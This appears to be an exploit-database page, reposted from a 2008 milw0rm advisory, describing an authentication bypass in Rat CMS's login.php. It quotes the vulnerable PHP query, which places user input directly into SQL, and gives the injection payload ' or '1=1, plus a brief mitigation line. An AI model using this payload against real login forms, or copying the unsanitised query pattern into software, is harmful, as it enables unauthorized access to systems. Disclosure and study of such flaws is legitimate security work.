header-logo
Suggest Exploit
vendor:
Rat CMS
by:
x0r
7.5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: Rat CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

The Rat Cms Auth By Pass

A vulnerability exists in the Rat CMS login.php file, where an attacker can bypass authentication by using the ' or '1=1 exploit.

Mitigation:

Ensure that authentication is properly implemented and that user input is properly sanitized.
Source

Exploit-DB raw data:

---------------------------------
The Rat Cms Auth By Pass
---------------------------------
Autore: x0r
Email: andry2000@hotmail.it
--------------------------------
Bug In: \login.php

	$sql = "SELECT user_id 
	        FROM tbl_auth_user
			WHERE user_id = '$userId' AND user_password = PASSWORD('$password')";
			
$result = mysql_query($sql) or die('Query failed. ' . mysql_error()); 

Exploit: ' or '1=1

^^ Got Root?

# milw0rm.com [2008-12-15]

Navigation

Suggest Exploit

Services By CQR